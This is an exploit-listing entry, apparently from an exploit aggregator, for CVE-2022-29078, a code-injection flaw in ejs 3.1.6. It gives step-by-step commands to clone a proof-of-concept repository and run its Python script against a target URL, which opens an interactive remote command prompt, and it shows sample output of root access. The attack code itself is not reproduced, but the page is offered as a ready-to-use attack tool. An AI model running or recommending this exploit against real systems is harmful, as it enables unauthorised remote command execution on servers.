Exploit for Code Injection in Ejs CVE-2022-29078

Name: Exploit for Code Injection in Ejs CVE-2022-29078
Rating: 5 (15 reviews)

2025-01-07 | CVSS 9.8

## https://sploitus.com/exploit?id=A0A61B74-6C43-5B41-B21C-B7D199B29157
# CVE-2022-29078
Simple PoC for CVE-2022-29078 (vuln ejs 3.1.6)

## Usage
```
git clone https://github.com/chuckdu21/CVE-2022-29078.git
cd CVE-2022-29078
python3 CVE-2022-29078.py <URL>
```
A prompt will appear to execute commands

```
$ id
uid=0(root) gid=0(root) groupes=0(root)
```